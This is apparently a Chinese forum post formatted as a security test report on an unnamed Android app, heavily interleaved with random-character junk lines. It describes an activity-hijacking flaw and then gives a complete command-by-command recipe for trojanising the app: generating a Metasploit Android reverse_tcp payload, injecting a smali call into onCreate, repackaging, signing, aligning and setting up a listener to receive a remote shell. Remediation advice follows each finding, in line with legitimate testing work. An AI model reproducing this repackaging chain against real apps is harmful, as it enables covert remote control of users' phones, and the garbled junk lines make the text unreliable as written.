/ K5 t; ?" v2 ~/ p N |
V' ? {. O# C' e( M# p! q# d: J! }
3 `& H" a9 E! B3 j/ s: V
0 s9 J- ~' j+ K 2 检测结果 ) g: r+ U' t4 A
% [& x7 m. y+ S- |2 }. b$ I% E
' D: G; B2 D1 `8 v! K' W1 c: x' G! {, O, }* g8 s% z) X8 P( I
( b$ ~, E4 N, @8 F L
( ~/ q( ?4 h- x* o! `- h 2.1 某某某
2 o# S, V" r a' o
! P2 b" _) j5 j" `+ c3 q% Q
" y q; f4 n j$ d0 r1 }) K$ W
6 S) s- J4 z; c- P* r
. W3 v- Z7 O! B$ c0 D8 k
( W, q O) N3 g; {+ j( r
2.1.1检测目标 q! s5 o7 u7 S: |) M
3 K$ M9 d) C0 A8 H; Y
. o+ u! `( d3 E; w- ~7 J% A
" h! O$ {" P, S+ l; v. T% I" @ + b' e) _* j5 y9 i. j
; Y, W8 W2 E& J# ^0 V0 x6 `
目标地址: 某某某某某某APP 3 B' }4 e' s# j1 C) A
- M# t; Z- _! g
1 e) M2 ]+ ], |' i) I
) V& ~6 ~* I/ G, Q, o + @# o. h; T2 {' V
- y! F" z) \% Y& c6 v% P; i/ p6 f
2.1.2检测结果 0 t" d! J! r, V. t
! D# C3 N# {* A8 X! u6 u
; _ X; f6 V. |( }( _
c# m6 A! `5 o/ j! m
! d% S i: v' k; P5 h% u' G2 \2 h0 ^$ c* M+ |/ r3 d1 b7 r) H
2.1.2.1 3 w% H, u5 ?1 q
3 P2 d/ g( T' v/ ~4 f- q! S# c2 b# j
0 D* W) R8 A: S" S( M/ c0 L6 _8 u3 s4 Z2 [, z
: i6 j& O, |# s4 Y9 ]- I
/ s: D0 ] {4 n ] 漏洞链接地址:某某某某某某APP # N- v% Q. K7 m9 O, R
% C) C2 J# D# G) R4 e4 c2 B: m
3 O n- ~4 c9 \. M. n8 n
! W+ y% N% C9 k3 P. k$ t M( S
/ m5 @& V3 l: n4 A& R
7 Z: _ P6 `) j# p H, N
9 k5 W* R2 f% b' D
9 a( S0 K) C6 h2 L, Y
; r8 d0 j. x) S" S, |: M3 z
" f0 ~& r* {5 U/ `" \1 o # V" [1 R# A. U
; N8 m4 }" _1 @
漏洞分析及取证:
& P2 u" x5 F8 U2 f! t! x* ] p( j" g# j" \
w. X- V8 T0 ?9 J! c" W( w6 o
* |2 K+ ^ m4 H8 ^* f/ o0 [" Q
0 H1 l, H& J2 X8 j# F% E( @0 x8 W, `. Q
4 i! M9 @8 y4 K- u5 C3 R 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
( i; |+ k8 T1 m6 q$ V3 s7 N9 v7 {% ?1 H3 t
! {/ a) w6 ]$ u6 g" C: T
: B* e3 I# a8 C4 W: y * m8 F$ H9 y% D9 V% n' y7 N
8 ^# C& d2 n# E4 Q) F
, |* O& k- E5 N7 M# J' A
9 b; \5 P7 M/ i! y6 x9 T3 I
! T9 \4 v# _4 y6 j1 v- P6 A$ D* ~
: e) s& Y* W6 K n9 w/ k
+ ^! a# r8 k$ j7 q! T' `4 X2 H: W4 R % b5 h0 z. ]) y- s7 i
; Q- n4 _; i! Z) V' ?( G, X
. r( t) y6 L8 J+ y9 P) w7 ~9 N! z( N j5 ^
, _% v0 m0 f C: t$ c' Z
- u& {7 f" t r, v" G6 R
7 j; T1 E( p& j1 b, i) E9 S- _7 @) T; @: f1 L6 G3 T, c2 L$ I
# }2 Y1 x' H1 @3 {+ O7 L4 E
3 ]$ u& v% b+ ?; w
L4 z/ n( W, E6 E) L6 d5 [8 _
5 n3 Z( z8 A$ {( ?- B3 ^0 u" k, X 
* L1 k4 ]# ?' H; _0 A! C5 s9 I' m9 v+ N
' \& q: Q/ G6 @5 E4 e& q
: p8 |+ |* \6 a$ w/ ^ , A4 @6 ?4 l" `. l8 {; t
* u3 _% L9 @$ U; W6 r. N8 d 
: O! i: ~, o( T& L6 Y
) w, Y6 }& z* }$ H+ G, R. f- X
' F- G& J# e. ]2 e% e- S
) Y" q: L* r! @( }! \, p
+ s" B% L5 x9 g7 ?+ ?" H+ W; V( `) V& w1 K3 D# w1 z
漏洞危害:高
) k' M/ [5 _0 X1 B
' v5 K8 P; v& u* _
% m0 p& s+ l4 x4 J& E2 Z
* e6 P* Z; } a! [
) w; @. k* j5 y+ C/ S& |# I7 E6 ?
! C( X* L1 I8 T i. [# e) O5 K5 H" _- C! T
$ c& V4 z# d: y, B* V
/ {& C9 g8 A% p! c( C% v1 Y3 @4 [& j% F$ u# ]$ @
: P0 F& w o' t5 Y$ U" D# U4 o
- ]3 X7 l3 O) m- z/ q" |! ^
| ; S6 P# [# e2 a
* [' Z6 m- M1 {7 A D% D* _$ x
/ Y0 X/ f8 b* C- d) \! ]& ~( M
; A I! r" M3 x' b6 s( ~
严重程度
& o. K2 i% F! D. S1 Z7 m8 ]6 f/ N' b" D- v( ?
$ l& i8 \4 f6 E+ t
3 o4 C2 @/ D) _! b8 v, l I |
/ j) Y8 Y# R% h# X- G& w$ e% |3 S& k j) F0 c5 S
0 \0 K( p& Q, S/ Z! q3 x7 m9 {8 T" t$ @5 j
% A. R d4 d) Q! \: D$ K, W2 x4 x3 n8 h: n. e+ {& F- [
高
} i7 }/ C. R# o
) x1 _7 Q( z; d9 f( Y + o! q8 Z @0 C( p
% z3 I5 Z3 p( h' [- ? | ' h. K4 ?! n2 {6 t5 M% E
6 U1 E) L1 h. s" O( ]5 J
! N" u6 }& p4 A, ^# x
' [# E. A j0 C2 s) E " I5 V. ?$ Q- F- @
/ t/ L0 \- |. x
■
* c* L3 `" i3 j/ I! x" e& h$ i7 b+ |) O5 \, l5 A
- t% p% b- ], }4 O9 x: m$ ]( ]) w0 d+ _/ g' y* [
| " A L* H# e( T% Y/ L/ w
* R( u- v2 L0 D. G, d2 D
: A0 z! i: m, P
$ L" ]9 Z% v; Q ! y+ T4 x" n7 f$ a
6 E9 m; O; G/ b- X v5 `) I 中
6 f" o, P5 x1 |* p0 E
9 B T6 D0 v# c% k* K
9 |/ I( F% r* m) `: ]2 i: p2 [! k9 x9 m, S- M: o ~" k% L$ _$ w4 c
| ) _5 o: I$ x6 N& H1 M4 Z
# w1 e( f0 ^$ y( e! ?
* w3 v7 a2 Y, I# ?
# W+ l1 P4 I# V3 D; P) N+ z
/ f& O2 `9 @' Q' w; e$ M) a3 D9 e9 e \. r" i1 u
$ J. g: D9 U) `& f# y4 _7 p
' Y8 A }" `8 X7 c% l1 |: K 1 I6 J( j: d4 F; [9 G
! d0 I9 ^" i- l/ h' } e2 L- r" e
|
+ p$ N- B0 g7 p+ a' c4 U. @9 R# ]' T# T# g- ^1 n; F
9 D3 F3 [, w9 X ~$ K
* w" f$ X# }0 \5 }; [ q % t- q" ~+ e) g. u2 H5 O
8 R. j' n" m: I9 Y: X6 L% y- } 低
' ~/ T: y' _3 f, t7 e; i
0 l! @* Q; l6 ]0 }& ?
1 e: c' s8 K ~! d
+ j$ j; z& g* R) F" R4 p3 m. V) C |
* v9 J! q6 n- |' Z4 r. h( R* y, {- d9 f6 v
& a3 F, b8 X" |1 s) h0 _/ ~7 U7 S3 c* T3 x. v
# f- J8 d& T; i; m3 P4 _6 o) _- _: X9 v t0 {
@" e. |" o6 J" X9 T8 z& j; k7 |' ?. w
4 a% L( p5 R: _/ \) t9 o* }( M7 X) }% I+ z+ t) x9 u: X8 _! A" V: J
|
5 }; I, l! ?. H9 e0 r' u8 F
; J+ G" n( x2 V1 o7 n0 {
0 f: H+ M6 w' R3 o( V+ u
) ^3 M) U; E* ]0 L4 h6 w$ q
4 M- x2 }! [; M' R/ D4 g( t* v% V1 t
+ T7 x) d* z6 u0 A
5 \- e7 q% t' ~$ K; ~$ {* |2 z, ~, e' A- K% ~- G/ C
1 K/ k2 S7 e5 X2 N
/ P9 [ e( B; Y. p- G6 C % t4 k! u3 w4 [) j4 P% w% \
- N9 _" x k: f3 {1 B1 s
2 x5 _1 u: V4 c; k& z% Y) C
0 S3 ]. c& I+ B; X' H
* o5 p5 Y' e9 I, E. V' B
9 K$ F" J, \: m! [. h9 b
8 R0 q( ]. v/ a* R! a- M. T3 B5 o) F3 y4 v2 g
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ; V: S2 O, ^6 t2 T
1 [) U/ q, h% H! `2 r( a
: c% V4 M% i2 _# Z+ q; I S5 q( a( d7 V9 B
" j7 F: p% C i* ~8 J" Q) l0 ?% F+ U: ]5 x
* H+ {& `0 f% L- I" B) _- `1 h# k4 B) a y; _9 S7 A
- p5 D: \: q0 h/ z) O; r% V7 \$ s
+ R* u% h7 q' Q
9 M1 d2 Z7 b6 f4 s/ e2 u& a$ L* f1 D9 h" y' J- U+ K' P
5 l8 I* V, v( Q6 R7 o" t, O0 s1 I4 E7 _
( j9 Y( @9 N% F) |4 t# D+ E3 d! g9 K
- Q* P0 ]3 T% n) c9 X) d9 ^
. j6 K2 ]: v5 ?9 a5 ^$ |# K
) l& K: q' K- \/ b% H8 \) J 2.1.2.2 # u) Y3 J1 x: i1 U4 O
1 x7 I+ d, W7 c! k
& M+ N! k2 A; l* I( a t/ B- ^2 _# L/ Z! r4 s& S7 s- U
: e: d: f: b P" C& Q( ~. X0 M0 P
" j3 h$ z( Q4 q& ]
漏洞链接地址:某某某某某某APP
% z! @. r3 D' b4 D0 h. F; Y( p# h/ P5 }
; Y& E. j! O* \# V/ t3 R8 q1 W4 G
4 u5 E# y I: e) E4 g k7 h# U 4 r# A" T9 H( Q- O, y$ i/ E
, t/ M3 t) d5 M) v$ J2 g1 T 漏洞分析及取证: ) U- f5 h! N1 o) c5 H" C
/ m: a2 y9 H. V* Q1 |
) U$ D% ?: I ]4 [8 F
) m' i. V+ Y3 D* y! F 1 d7 ?9 r! T0 N
5 {! U$ B6 C$ z, @
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
3 B' U7 f( y8 D) ^ A9 I9 I9 Q$ _3 X) f1 g
' S5 Q: L3 T% B1 M
+ |' z& R2 q" \8 s( \# c, \4 Q& M8 I
+ N- q; b+ h4 M' q1 N5 B; m
, Y* w3 G b( N2 i* T* w+ a& R 用Metasploit 生成木马 apk
7 w0 p! X' m2 A8 f+ w$ t/ z6 E1 u! |$ A8 n% y- ?
! y5 D/ f& a X& V$ ~' `4 f p. x- u5 L
9 `2 L$ O4 h$ m$ n% M
8 V; u. \- q0 M0 J, e msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / K- H5 ]* N+ I- k8 [" ]
# D0 G, h% o0 P( B
1 {3 P6 _) v" ?
& v% y c( P# {& V: Q* r
?7 w6 g. J4 x, r9 [* i% E6 d
8 G3 N" h; s+ L/ S- Q5 L
反编译目标apk和木马apk
6 S2 v4 R/ L d# T- [9 |) R, L, R \1 m3 s9 X5 j
4 O) D4 a$ p1 J" z& r5 X6 P' w% p) K5 b" T& ^! u
) h4 ^! c/ J/ H& v5 r4 R+ H5 \
% b/ G* S4 Z! ]+ D: T# ^- t apktool d target.apk
- m, \0 \! w: m# v( ^+ K: k9 q
' ^/ @& |0 @* W" P, `7 d | apktool d cockhorse.apk 0 a1 ]' e4 D& u' i5 Q6 `
- D& f2 ?& w+ T' B: w, D, s
; Z" Y$ Y# {0 ]( @0 Y3 ~
% l1 ^' \' ?+ c5 L# c * _. H- u! ?: k/ ]7 U
1 c% f7 ~; U: \; A. m 木马 apk 注入目标 apk * p% O3 ^! A! i: ]' s) l: a$ \
4 f. I) d2 R7 x3 I" G
, g2 `! [- P& C5 @; |; U1 B
4 _- S7 N3 d7 ?. @
/ ?& Q/ h( ?( T8 e3 R
- G6 v3 J) c' Y8 |' N% c4 n
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
& ?' M1 f- Z4 `- ?' Y# V
( P4 o6 _$ k8 R2 f# N$ C0 J* H
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 J, ?8 h& _' g0 I7 R! L# x) Q* W* R" w0 U( W: ~
( e3 {$ r6 }! ?% H! v0 G
?+ O* t$ c A; l& a/ X
/ n0 Y' m/ [" f" c: x9 I) [" ]& Q; l# ^* {! {1 L* H
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 % L: U W2 a* B& U
0 }* G! x. i2 p* N0 p$ {
( K' @* b; h# q7 @
: o0 S1 j2 @, r: m$ A
! j) k: Q. F: B. z/ B: A( h! C, j
5 ]: t9 `. W# w" z, g* { 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
; ]% q9 z3 ?8 t/ Q* z2 _% U
3 I) p7 o/ J) O3 o, c8 @3 _9 [
* |/ i/ g; E* s0 _: n
9 P5 l6 r* H1 j' X$ s' w i
& p( h8 _& V9 t
& F% A! ], x j2 ] 回编译生成最终 apk ' ]9 e5 h# z1 I
7 q/ @( q5 U% A+ {, r: `
+ E5 p- b+ T8 O
8 N0 U. Q5 H5 O( s, e
1 a: e! f6 @6 g) _1 o3 N9 P
' v' K8 F; c' X: J2 _ 重新打包 0 A! F6 H" { r9 [
+ O V! L2 d+ X5 G/ @4 |( b8 P" p
9 G0 Z8 i: K9 v$ n
* V3 v/ h* Y7 ]8 l$ F# S 0 P+ q3 v$ q' P3 l9 t5 f
, }5 S! J% Q: g6 R; }3 U# E apktool b -o repackage.apk target_app_floder 7 s Z, s; i! F! V: @
, d' r3 l" Y& J0 r5 H* G
/ P, Y0 z- g4 W9 C7 q" v/ a6 Z
6 i* F4 O2 [1 `7 z
3 @9 d+ P9 n2 f$ b8 l: N$ v2 W/ e8 q2 H# A# C) `( ` c
创建签名文件,有的话可忽略此步骤
i8 b" ~. \: r1 n3 I4 _3 Y
: F) N* b" i4 \
* P7 Q4 l4 s4 G% j* Z) H6 p
4 l" d9 J2 y( P0 [) e0 u3 k
5 O- t6 i& X, D7 \* H+ E7 j
! {1 t/ n) m4 z- L keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
0 ~) _# _8 B9 b1 I. |2 x& ~6 D( f. U
k/ H6 r G a; i' s& D: Y
; N/ B! g0 B8 X8 p9 M
* K7 ^% t3 t$ y& A0 ]
7 E% f! D. N; a6 a; t' e( |9 d) @. x. X$ A
签名,以下任选其一
# r/ [4 \1 @. V
- C* x0 [0 ^, w) h
" E) x* s, n# d- d# T# q4 |& a* c
' c5 Q1 W4 H& l7 p% b, Q , F5 G) F' B* s3 y& L! q' t F- U# S3 Q
2 L4 y d* L5 [( v& r
jarsigner 方式 + H6 L Y, y+ Z+ J7 m
( f6 `: ]; T- r* W. l* I
/ E: w8 C) p; o4 T
4 p% a' @0 X5 E" P% ]
6 V/ H$ }) k6 L7 I9 w6 i; ^. j9 R1 f4 N/ [# m
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ; Q) V* s- G7 n
) f& t# o- x6 }9 q: M* P4 ?5 u, {* ?
$ E6 n+ ^. @4 S: @6 R& i h, d9 \5 N' T8 w% Z9 T: c4 Y
7 ]. {3 z4 i# ?/ p! b( c4 l0 p2 f! v+ t( ^& G4 ^- M
apksigner 方式
$ {& X n8 g% r3 f5 }) m% m2 s7 g
+ q7 N' i. c6 q0 E) _
$ n- n7 m9 `4 k! L# U! N9 u) P' D
! K8 ]) @" Q0 A7 \ L+ v+ A. d/ c
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
- Y6 B& R4 z5 V1 W5 J9 ]: P# |3 ^& f2 ~* O
( e! M1 Q) d/ D
6 E+ ^* b# W- h% l+ R4 \) P: o7 ]+ R ; k g& M6 `- \+ t5 ?+ ^
. L a0 ~( s+ ]8 X6 h; l1 \/ V9 ] 如需要禁用 v2签名 添加选项--v2-signing-enabled false
# `6 h0 l6 l b; k+ u7 {$ d2 K3 z4 [' p% a/ o) j
7 P, a- X4 b7 \0 L! n
2 e& w) h9 i& ]9 t) e2 T
, \. `5 X: `5 @, }% q i. }1 q
( Y& W E$ S: V, e M* _ 验证,以下任选其一
# S% ~( V& b" G0 b
8 {) }0 e9 o% h; I
& q' ?7 X( b4 N# U: b% l+ ` n: ~) n9 C8 Z$ B5 u l
( M) n7 Q8 K' {- O1 p4 G0 T. ? n3 A9 S5 @. F
jarsigner方式 + P* B( H# j+ V [
) S" _7 p. g9 [* m; U; y( D
& R1 f- i4 s8 p4 K/ q
/ m* l# a) c( l3 ?# x+ S, c1 b 0 J1 B9 N# a; s& ~4 ~
7 i* @+ @3 j- O, {+ {! } jarsigner -verify repackaged.apk
3 ^( y0 W! [ ^# o7 _( k& I% K, v ~" d+ h' @
5 m$ C/ K9 K7 q* }. ]2 Y; Y' L5 {( }, ?. b/ ?
+ z. A0 q$ V$ l$ p$ O( e- _" J- h3 s! ~1 Z# A0 I( Z3 B
apksigner 方式
. H/ R% o1 C4 X% i2 \( ~ W) c4 s) v- t+ P
/ l2 Z4 a9 D0 g8 x4 T5 m; F |! D& \
7 D+ ]: M7 O5 E- ^" s* L
6 S. \' X# s/ D! P. d) j3 Z
; S3 j2 p a7 E0 m$ K
apksigner verify -v --print-certs repackaged.apk
, S2 G2 v; C( t) m8 M4 o" J8 I, a3 G `
: B& w, l8 g% q% ^5 L8 N
8 H. E9 y3 g7 V / R/ R3 s" a. v7 ]) F
' ?( K* _, p+ O
keytool方式 }* N8 I$ \! A% X
7 z3 r1 S: ]; D2 U
$ y8 @! P0 K% f- u1 e+ N. V5 ^: {# x0 M# O, v2 t
9 z" b6 o1 `( K' ]! A; ~" | ^6 T- ^& S+ o
keytool -printcert -jarfile repackaged.apk
; h! ]3 H1 I# [2 n+ C8 h$ E& ~7 I, h7 d0 e, F* Z3 p4 e8 ?
) l( ~; ~9 H) k/ @. ^% I4 c; d4 |0 R
M7 F" M% ^# m: y W
9 J* R* e+ Y x) K 对齐 # X, G, ]# n- i# f. g
# ^% a' s7 ?% v' C
# v* I+ x+ y# ^, S! z; e Z- K7 A9 U( l: f
( G1 J) W$ s5 w6 o4 P
; b3 m0 I9 w: |/ M 字节对齐优化
" O7 F# m5 W3 C% f
+ O$ G) ]/ Q' ^: C; z" Z! J
5 _+ u: Y- v0 J
1 h6 q- l$ m% P0 l% q- l' w $ \) ^7 y0 k4 S& v! ?
$ i; \; J: V% J4 p: R1 [
zipalign -v 4 repackaged.apk final.apk
& `: m7 d; ~7 p0 s
0 x' k8 F+ [ a) K! O
8 v% s1 m" i8 h/ l9 X7 g+ Q
0 K/ e" F" C* _; l
( L) Y; J) |$ w7 ^- ]' B6 p
$ { O, n8 B) J- M 检查是否对齐
3 v! o1 c6 j# `( h3 N9 a A
4 Y* M2 o9 [! U
$ S# O }1 e7 S: M- _
# A# a2 E1 J* M$ w1 G
( X" n' o6 _" ?- s9 O; x( s- } q7 B
( j7 b ~1 c" J4 c- B zipalign -c -v 4 final.apk
, `0 N9 Q! h/ \8 i3 Q: e) M# g
4 b/ @# }' Q0 b) k& I
- C3 k+ e+ O: c% B0 c& u4 t8 P9 n: \/ I
9 c; v- {& O# d' f: ^6 d
* E _/ E3 _; V5 j 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 1 K: p4 x! I6 g
) s2 e. ?3 C7 |+ b- c; h
+ q- r& `7 C6 [1 f0 P4 y, d( C: d1 `
! ]- N! H/ N% ?
% J+ _: U# A! O, H3 ^2 U7 @) |' {- J* v0 F4 X# {( `, q! _6 M { P
启动Metasploit控制台,配置参数等待上线 8 n3 t% Q p ?
4 `* p- |9 T! d! w/ @
1 F8 B/ O1 e+ h: k/ H3 f5 W+ H/ N0 W
: |# e/ y0 l0 I3 ]: e7 g$ x0 E7 X' d4 c1 G8 w5 S
在终端依次输入如下命令 & h. f1 R# K6 w3 ]- S
- a6 V, ~* R& N
8 z9 \5 u9 |7 {1 r
) ] V& C! H4 v; P8 s ! m, f9 T F7 f! H
- d6 i, Q* O3 h& K, s( V
msfconsole
( \) v, `& b: z: ?2 M. | D2 i K% A' \5 H t& h- {
$ t% V% S! @+ K! Y' ^- E! P! R" {" _$ @: J* l
4 L! {+ r4 E/ i0 L
. Q+ p3 T- y- X7 H( X0 Q$ o: M' v use exploit/multi/handler
7 V a8 N3 u% W, ]% s( }8 p" j5 ^( N$ r# z: {. e# z- h- ~& Q
9 ~, O, b$ f) d) n5 r+ R! Z6 s) P+ r' r% l2 z8 Z5 h, D `
) `* d2 M1 O8 A# t- X: `; P: j+ k7 d5 w
set PAYLOAD android/meterpreter/reverse_tcp ! t- v: N. A, K
* X7 u( J: i$ c# X; B/ E5 [$ \
" Q4 x; M) E- G5 S+ W& t: x
4 n+ |( C( o" O" O& U* w( Q) |
4 V+ L4 ?6 W4 A, ?& c# I. A" v
( ^& ?8 r* T: Z' z% C6 F8 O4 k0 x# q0 V set LHOST 192.xxx.xx.xx ' N6 G7 d5 I+ v+ b
" q" U, m$ k( C9 X2 B. ^
' K$ e) N8 j5 e& o. W6 y' r2 @+ ~: o
( ~( h) P4 m- D9 g( ~* `9 B3 d/ l* E `2 T5 P5 e
set LPORT 4444
5 q4 ~' Y& p& t' _$ N, \0 e' I# @6 {, x: _
- e, ^4 f7 p+ M/ m6 r7 a
7 i5 y* } t# c; b d 8 \ U* x1 V8 b
0 N( g+ V0 D: V% d6 q exploit
% z; H2 ?5 B# _- a! y$ J' j* e& b/ s
( ?2 F* r8 D) ~& K5 r3 S' j
4 D! R. a2 U4 b9 v7 y n& J$ J' R" e7 ]. G# I. g
* J6 ^+ |8 k0 C' o: G* u/ s# b4 |; ~! y5 U
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
& F: c2 l$ {( c
. o t; x1 ]' Y2 R* ~$ I0 [& I
: T3 \1 M% |( k2 ^' \* e z8 D [ i
" M& }# z: @: g" h0 F
0 w5 j' v; J& l7 b B& d 漏洞危害:中 6 P) N; w0 \* j; I1 @1 g
9 |4 m2 h L4 G% I7 R# q* y
2 p6 m0 {3 e# j7 K. k1 R! R8 p0 y' |) y+ f7 s
$ R% c5 B6 F* Z. z3 Y8 v7 t6 {
7 k! J2 S) B0 N$ l1 y* X
: [8 L+ d& ?, z# G% e6 X0 O: z% s) Z, q
& v8 R: u$ f2 w7 q/ N5 P4 @" n( f+ i
/ f. G' u0 F% [3 v. O1 z" j" A$ O/ C$ Z1 G
F5 o6 J0 ?3 E4 J( }( P5 o& s1 s
& h# q( y2 E& D- ]
|
+ ~3 d8 f0 m; F1 ]/ E1 [. [0 [# G T
: I X9 ^ ~$ ~% i
) O; J/ q+ W3 H) s6 M) I7 P
严重程度 ~$ e5 j7 N3 `, q( Z
% s) ` V8 P U" c& k6 [& V4 d # ?* B+ l# K( V& C2 V3 Q
+ k8 [# @8 Q% R1 n( U1 X1 o, } |
* Z- ~4 ], }% l' Q( G0 t1 i4 v; q* S* b) @9 K' j
6 X! {9 M l& ~' |4 [7 h6 |
7 j `4 I" W5 F
5 a8 S! W8 _% I, T$ p7 d% v" i! t, m, B1 M1 `3 r! m) e
高
; T* u u& J3 {& f: o N& o6 g
# W4 j# c& w, t2 i- A n, n+ T: R - Y6 p' t* H1 t4 Q$ Y
0 j5 M0 ?, w1 F3 B4 f |
( ]2 o) c9 D% S* Z* B) O j
3 l: ~: t3 p g- |. s& H5 e5 |6 R 0 ^. _- v5 y; c" `5 U6 E* z
% n7 t6 G; M* w9 v& ]/ N2 V 4 }$ g% ] @ Z3 L$ e# t' Q
, M: I* W2 |, e. _ ■
& L0 D4 s3 O& m8 |
; ]/ m7 x9 q. X) H' L
2 y' S5 ^' {2 N; u, `
5 a( _! p! O r7 W4 D | ) m$ |2 F) B1 D$ b' i; J9 M
7 P$ [+ G1 q5 L+ L. A! y) j 3 q6 j# l) I; ~" t% U
2 M% i, V4 P% z, r, v( u
, j6 L- [% {: J; c( g# X1 \" q6 E9 f# ?- T0 v* W
中 ! }6 E3 X, b1 m$ c- B2 g* V
( u; M0 I; L$ X ) |2 B: m6 l. j9 n4 O4 D
* F" \5 j1 c. m& W, R |
* ?/ {7 k( q' y8 X( J9 n c6 {( I, U/ _. S
% l8 b) q$ P1 A' Z
& Y* h5 k: w% L+ @% W/ l
% O. n& k9 x, v7 O+ H: K$ ~0 L- s* C0 Z& G% s, W; `
( a6 s# @! \+ }: F$ s X% r: s) V' o
" e. t7 ~6 q+ B
9 R9 ~' E4 c2 s7 V* H2 N
/ z4 ^" G( U5 Z$ j6 _ 1 A( p& \+ x" l7 e2 q
+ Q+ ^" @! s0 d" O0 C% d6 L' S: A | 8 D# O7 H+ v1 y9 ^& j* F" f# O# [$ m
$ ?! \* l/ r% i+ m& ^7 O
, |* I) W& N1 h1 q; Z9 n v1 V; e1 i, v3 |( [
$ g3 Q- ]3 V3 \0 k- W7 J
4 ?9 D5 D1 H" A3 Z. R2 ^2 Y J
低
0 k' t N+ h% s/ w) r% T) S* A: F3 e; H
# _; D* } n0 N c5 X; |4 S
0 j7 `3 s$ x- n' n( V5 @- x, z( G- h& u8 a5 O
| 2 \3 q, Q, g) z. e; h! X
( B3 m- Y7 D/ a Y, A e8 M
) B% k X2 f: m8 p8 m8 ~) k1 r, `" U3 p7 U
+ v- \8 X5 W: i" X7 v' V2 M4 N" ^: p
8 c0 m6 y- V3 y6 }' c, ]7 n
- Z/ I* _9 W) V1 p0 I0 t3 R) K9 {; P: @: j3 U5 P% p- l7 D
6 n, h" T& b) k, A6 s: m; |& |! `9 `1 z0 x' v1 A
0 a. @- g' ]# n- n
0 t( K& T: ]8 a5 q( Z) H
| : g6 o V$ D7 G3 _% _. e8 o
2 J' _4 `" Q1 a, O4 E( q' A8 y; {
" X/ p6 T, D* Y2 I1 I4 `, C. ^" i6 Z7 g0 d3 H. c
# {% r1 e2 O$ U, J! }9 ?
2 t' ]" U" [+ D1 x; m6 U
" P, D [5 K; J7 z
- v$ i6 g( w' g: P9 u, b
% q0 g4 x( T G* b0 _9 X* P+ t: h0 d
, V/ C$ j& G3 z% K' G: q8 K4 [& _: n6 D5 o9 z
$ Q/ k) D6 G+ j
3 ?2 a9 n$ N4 Y
( w& m- I+ B5 C J0 e7 b. p+ a
/ F/ v. U) f/ e6 m2 r
/ O/ F6 Z+ @& S/ m# r! ^7 r3 {# X5 {
修复方法: 5 ?1 y+ R4 ?4 S* |4 O6 v8 U- p: a6 ]- Q
9 y( R; F6 ~: H9 s; z) Y" P/ d- V
& Y, x5 g [( i2 |3 w: Z O8 A
; ^ g/ Z' j# r
( E ? w4 D2 Q, e- j+ {
0 Z: V$ @* ~% a 1.在 APP 启动时应做签名校验防止二次打包。
) L3 m* }0 S! S! `* ]9 {. P$ [# Q: j/ `& K+ m" z
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
# ^* \' N5 ?' P" y: `; j* |) t, B- l9 z, t
" z: A9 o$ |( U; x0 U$ i+ K( c/ N7 {8 {7 C
7 _/ E+ H8 i6 e: b( O
' G) w) p* I+ ]8 _
9 x$ F, I' I: N" g( q5 t+ ]) l1 t: F
: Z5 Z# P" ?8 x2 `$ e
; s2 t' u' W0 z. L$ \/ y7 X) A
/ [# U; G3 n( P- a0 L4 C: Z& Q0 ^8 q* V2 g( j- E9 Z
" N' K" {/ m8 g t0 X) R7 g/ d6 o% s9 n
4 z* c O& w1 k& X Z
i$ |0 ^) z6 @3 r( \
9 {/ ^5 P6 |2 T. f$ B0 g3 U
x# O* }% P5 E( D
5 |7 B, p* L5 v3 r, k
" z) Z) ?: l0 F ~( A, U3 t/ ?+ F0 h# T 
发表于 2022-6-8 20:32:44
收藏
支持
反对